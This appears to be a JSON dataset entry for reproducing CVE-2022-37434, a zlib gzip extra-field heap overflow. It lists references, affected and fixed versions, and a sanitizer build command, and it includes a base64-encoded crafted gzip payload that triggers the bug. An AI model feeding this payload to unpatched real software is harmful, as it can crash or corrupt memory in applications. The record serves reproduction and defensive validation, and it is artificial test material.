{
  "schema_version": "1",
  "cve_id": "CVE-2022-37434",
  "summary": "zlib through 1.2.12 can overflow or over-read while inflate() processes a gzip header extra field for applications that call inflateGetHeader().",
  "project": "zlib",
  "language": "c_cpp",
  "vuln_family": "memory_safety",
  "references": [
    "https://nvd.nist.gov/vuln/detail/CVE-2022-37434",
    "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1",
    "https://github.com/madler/zlib/commit/1eb7682f845ac9e9bf9ae35bbfb3bad5dacbd91d",
    "https://www.zlib.net/fossils/zlib-1.2.12.tar.gz",
    "https://www.zlib.net/fossils/zlib-1.2.13.tar.gz"
  ],
  "affected_versions": [
    "<1.2.13"
  ],
  "fixed_versions": [
    "1.2.13"
  ],
  "metadata": {
    "source_target": "https://www.zlib.net/fossils/zlib-1.2.12.tar.gz",
    "source_sha256": "91844808532e5ce316b3c010929493c0244f3d37593afd6de04f71821d5136d9",
    "fixed_control_target": "https://www.zlib.net/fossils/zlib-1.2.13.tar.gz",
    "fixed_control_sha256": "b3a24de97a8fdbc835b9833169501030b8977031bcb54b3b3ac13740f846ab30",
    "validated_target_version": "1.2.12",
    "fixed_control_version": "1.2.13",
    "payload_sha256": "29634dfcd6188202f37c20c48e555cbaa0a739f8f78bc9b44972d041f5963d68"
  },
  "replay": {
    "title": "CVE-2022-37434 zlib inflateGetHeader gzip extra-field overflow",
    "vuln_family": "memory_safety",
    "repro_command": "gcc -fsanitize=address,undefined -g -O1 -I@build_root@ @artifact_dir@/zlib-cve-2022-37434-replay.c @build_root@/libz.a -o @artifact_dir@/zlib-cve-2022-37434-replay && @artifact_dir@/zlib-cve-2022-37434-replay @payload_path@",
    "artifacts": [
      {
        "name": "zlib-cve-2022-37434-payload.gz",
        "encoding": "base64",
        "content": "H4sIBAAAAAAA/wgAQUJDREVGR0gDAAAAAAAAAAAA"
      },
      {
        "name": "zlib-cve-2022-37434-replay.c",
        "file_path": "artifacts/CVE-2022-37434/zlib-cve-2022-37434-replay.c"
      }
    ],
    "severity": "critical",
    "candidate_file": "inflate.c",
    "candidate_line": 763,
    "function_or_sink": "inflate",
    "configure_args": ["--static"],
    "notes": "The replay builds zlib with sanitizer instrumentation, compiles a small harness that calls inflateGetHeader(), and feeds gzip extra-field bytes one byte at a time so zlib 1.2.12 reaches the vulnerable copy path. zlib 1.2.13 is expected to complete without sanitizer evidence."
  }
}
